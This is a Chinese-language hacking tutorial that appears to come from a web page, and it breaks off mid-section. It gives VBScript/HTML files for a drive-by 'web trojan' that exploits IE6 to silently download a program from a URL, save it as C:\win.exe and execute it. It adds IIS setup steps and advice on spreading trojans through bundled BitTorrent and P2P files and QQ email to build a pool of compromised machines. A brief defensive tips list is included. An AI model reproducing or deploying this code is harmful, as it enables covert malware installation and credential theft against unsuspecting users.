12px">【学网教程】
--文章画中画块幅-->
以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。
我们经常听到这样的忠告:
“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
首先我们需要编写几个简单的文件
一。
名字为abc.abc的文件
<html>
<script.language="vbscript">
FunctionHttpDoGet(url)
setReq=CreateObject("Microsoft.XMLHTTP")
oReq.open"GET",url,false
oReq.send
IfoReq.status=200then
HttpDoGet=oReq.respomseBody
SavefileHttpDoGet,"c:
\win.exe"
EndIf
SetReq=nothing
EndFunction
subSaveFile(str.fName)
SetbjStream=CreateObject("ADODB.Stream")
objStream.Type=1
objStream.Open
objStream.writestr
objStream.SaveToFilefName.2
objStream.Close()
setbjStream=nothing
exewin()
Endsub
Subexewin()
setwshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe/cc:
\win.exe",0)
b=wshshell.run("cmd.exe/cdelc:
\win.hta",0)
window.close
EndSub
HttpDoGet"http:
//127.0.0.1/test.exe"
</script>
</html>
二。
名字为test.htm的文件
<html><body>
木马运行测试!
(这句话可以改成你想说的)
<objectdate="http:
//127.0.0.1/win.test";;;></object>
</body></html>
三。
名字为win.test的文件
<html>
<body>
<script.language="vbscript">
FunctionHttpDoGet(url)
setReq=CreateObject("Microsoft.XMLHTTP")
oReq.open"GET",url,false
oReq.send
IfoReq.status=200then
HttpDoGet,"c:
\win.hta"
SetReq=nothing
Endif
endfunction
subSaveFile(str,fName)
Dimfso,tf
Setfso=CreateObject(Scripting.FileSystemObject")
Settf=fso.CreateTextfile(fName,True)
tf.Writestr
tf.Close
exewin()
Endsub
Subexewin()
setwshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe/cc:
\win.hat",0)
window.close
EndSub
HttpDoGet("http:
//127.0.0.1/abc.abc")
</script>
</body>
</html>
四。
名字为test.exe的木马程序。
晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。
服务器的文件列表
test.htm:
对外发布的网页
win.test:
下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。
abc.abc下载二进制的木马文件test.exe,并执行
test.exe:
木马程序。
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。
单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了
看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?
呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,
A。
安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B。
不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C。
不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D。
不随便打开和预览有附件的邮件。
E。
安装防火墙和杀毒软件的最新版本,经常进行升级和查毒
传播
本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,
内容相当丰富.相信看完本教程你一定会成为养鸡专业户.
一.目前流行木马传播技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件
然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.
2.利用PP共享自己捆了木马的软件或电影.
方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人
家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla
ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木
马.这样看电影也会中我们的马.
3.利用QQ邮箱传播木马.
这里主要点HTML格式----在里面写上以下这段代码: